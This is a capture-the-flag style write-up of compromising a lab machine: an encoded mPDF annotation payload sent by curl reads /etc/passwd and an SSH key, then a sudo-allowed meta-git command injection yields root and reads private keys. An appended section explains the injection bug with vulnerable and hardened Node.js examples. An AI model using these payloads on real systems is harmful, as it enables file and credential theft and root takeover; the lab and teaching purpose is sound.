mPDF read any file and meta-git RCE to root
mPDF is a PHP library which generates PDF files from UTF-8 encoded HTML. It is based on FPDF and HTML2FPDF, with a number of enhancements.

Interesting info from GitHub

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg
using CyberChef

❯ curl http://xxxxxxxxxxx/admin/download.php -H "Cookie: PHPSESSID=dd213s23d8mg2kds8fo10hf9hib" -d "pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF"
Result Output: OKdAtpf213e12edyJeFWPExZ0H.pdf
❯ curl http://xxxxxx/mpdf/tmp/OKdAtpf213e12edyJeFWPExZ0H.pdf --output passwd.pdf
CMD AGAIN

Then I was able to read id_rsa and get user SSH access!
Using linPEAS and pspy showed nothing interesting.
sudo -l
User may run the following commands on faculty:
    (root) /usr/local/bin/meta-git
Found this report online saying there is an exec PoC in npm (RCE via insecure command formatting):
Node.js third-party modules disclosed on HackerOne: [meta-git] RCE...
I would like to report a `RCE` issue in the `meta-git` module.
It allows to execute `arbitrary commands remotely inside the victim’s PC`
# Module
**module name:** `meta-git`
**version:**…
Github Check !

xxxxx@xxxxxxxxxxxx:/$ sudo -u root meta-git clone 'tcpguard| whoami'
meta git cloning into 'tcpguard| whoami' at tcpguard| whoami
tcpguard| whoami: fatal: repository 'tcpguard' does not exist
whoami: ‘tcpguard’: no such user
root
user@xxxxxxxxxxxxx:/$ sudo -u root meta-git clone 'tcpguard| cat ~/.ssh/id_rsa'
meta git cloning into 'tcpguard| cat ~/.ssh/id_rsa' at id_rsa
id_rsa: fatal: repository 'tcpguard' does not exist
-----BEGIN OPENSSH PRIVATE KEY-----
.....
trying to read root ssh key
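
The "insecure command formatting" bug class named in the report, shown beside a hardened form. This is an added example, not meta-git's code and not part of the original post: the function names are hypothetical, `echo` stands in for `git clone` so it runs offline, and the sample argument is constructed.

```javascript
// Added illustration; not meta-git's source. Function names are hypothetical,
// and `echo` stands in for `git clone` so the block runs offline.
const { execSync, execFileSync } = require('child_process');

// Vulnerable pattern: the argument is formatted into one string and handed to
// /bin/sh, which interprets | ; & $() and backticks inside it as shell syntax.
function cloneUnsafe(repo) {
  return execSync(`echo cloning ${repo}`, { encoding: 'utf8' });
}

// Allow-list for repository arguments: URL/path characters only, and no
// leading "-" so the value cannot be parsed as an option by the child program.
function validateRepo(repo) {
  if (typeof repo !== 'string' ||
      !/^[A-Za-z0-9][A-Za-z0-9@:\/._~+-]*$/.test(repo)) {
    throw new Error(`rejected repository argument: ${JSON.stringify(repo)}`);
  }
  return repo;
}

// Hardened pattern: no shell. Each array element reaches the child as exactly
// one argv entry, so metacharacters stay literal data.
function cloneNoShell(repo) {
  return execFileSync('echo', ['cloning', repo], { encoding: 'utf8' });
}

// Defense in depth: validate first, then exec without a shell.
function cloneSafe(repo) {
  return cloneNoShell(validateRepo(repo));
}

// Constructed input shaped like the argument in the session above, with a
// harmless second command in place of the original one.
const sample = 'tcpguard| echo INJECTED';
console.log('shell string:', JSON.stringify(cloneUnsafe(sample)));
console.log('argv array  :', JSON.stringify(cloneNoShell(sample)));
try {
  cloneSafe(sample);
} catch (e) {
  console.log('validated   :', e.message);
}
```

Because the binary is allowed under sudo, anything the shell runs from the formatted string runs as root, so the fix belongs in the tool and the sudoers entry should not be the only control.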